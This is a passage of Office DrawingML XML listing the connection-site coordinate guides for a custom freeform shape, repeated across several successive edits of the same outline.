              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY43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090259 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY42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090259 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY41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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 2779492 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY40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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 2779490 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY39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090259 w 4123786"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY22" fmla="*/ 3099544 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY23" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY24" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY25" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY26" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY27" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY28" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4126269"/>
              <a:gd name="connsiteY0" fmla="*/ 7915797 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 7600 w 4126269"/>
              <a:gd name="connsiteY1" fmla="*/ 7873197 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 4439 w 4126269"/>
              <a:gd name="connsiteY2" fmla="*/ 7844441 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 12582 w 4126269"/>
              <a:gd name="connsiteY3" fmla="*/ 7790887 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 20085 w 4126269"/>
              <a:gd name="connsiteY4" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 28081 w 4126269"/>
              <a:gd name="connsiteY5" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY6" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY7" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 27793 w 4126269"/>
              <a:gd name="connsiteY8" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY9" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 26802 w 4126269"/>
              <a:gd name="connsiteY10" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY11" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 27363 w 4126269"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4126269"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4126269"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4126269"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 27200 w 4126269"/>
              <a:gd name="connsiteY16" fmla="*/ 6855869 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 21919 w 4126269"/>
              <a:gd name="connsiteY17" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 47162 w 4126269"/>
              <a:gd name="connsiteY18" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 68017 w 4126269"/>
              <a:gd name="connsiteY19" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090259 w 4126269"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4126269"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4126269"/>
              <a:gd name="connsiteY22" fmla="*/ 4850102 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4123785 w 4126269"/>
              <a:gd name="connsiteY23" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4090258 w 4126269"/>
              <a:gd name="connsiteY24" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4072751 w 4126269"/>
              <a:gd name="connsiteY25" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 4072751 w 4126269"/>
              <a:gd name="connsiteY26" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 68003 w 4126269"/>
              <a:gd name="connsiteY27" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY28" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY29" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 19986 w 4126269"/>
              <a:gd name="connsiteY30" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY31" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY32" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 30530 w 4126269"/>
              <a:gd name="connsiteY33" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 19292 w 4126269"/>
              <a:gd name="connsiteY34" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 6414 w 4126269"/>
              <a:gd name="connsiteY35" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 862 w 4126269"/>
              <a:gd name="connsiteY36" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 0 w 4126269"/>
              <a:gd name="connsiteY37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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 27200 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 6855869 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY34" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY35" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY36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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 18269 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 6928626 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY30" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY31" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 19292 w 4127976"/>
              <a:gd name="connsiteY32" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 6414 w 4127976"/>
              <a:gd name="connsiteY33" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 862 w 4127976"/>
              <a:gd name="connsiteY34" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 0 w 4127976"/>
              <a:gd name="connsiteY35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7363 w 4127976"/>
              <a:gd name="connsiteY12" fmla="*/ 6988764 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 18853 w 4127976"/>
              <a:gd name="connsiteY13" fmla="*/ 6981739 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 18106 w 4127976"/>
              <a:gd name="connsiteY14" fmla="*/ 6961107 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 21919 w 4127976"/>
              <a:gd name="connsiteY15" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 47162 w 4127976"/>
              <a:gd name="connsiteY16" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 68017 w 4127976"/>
              <a:gd name="connsiteY17" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4090259 w 4127976"/>
              <a:gd name="connsiteY18" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 4123786 w 4127976"/>
              <a:gd name="connsiteY19" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 4123785 w 4127976"/>
              <a:gd name="connsiteY20" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 4090258 w 4127976"/>
              <a:gd name="connsiteY21" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY22" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 4072751 w 4127976"/>
              <a:gd name="connsiteY23" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 68003 w 4127976"/>
              <a:gd name="connsiteY24" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY25" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY26" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX27" fmla="*/ 19986 w 4127976"/>
              <a:gd name="connsiteY27" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX28" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY28" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX29" fmla="*/ 30530 w 4127976"/>
              <a:gd name="connsiteY29" fmla="*/ 8213677 h 10695515"/>
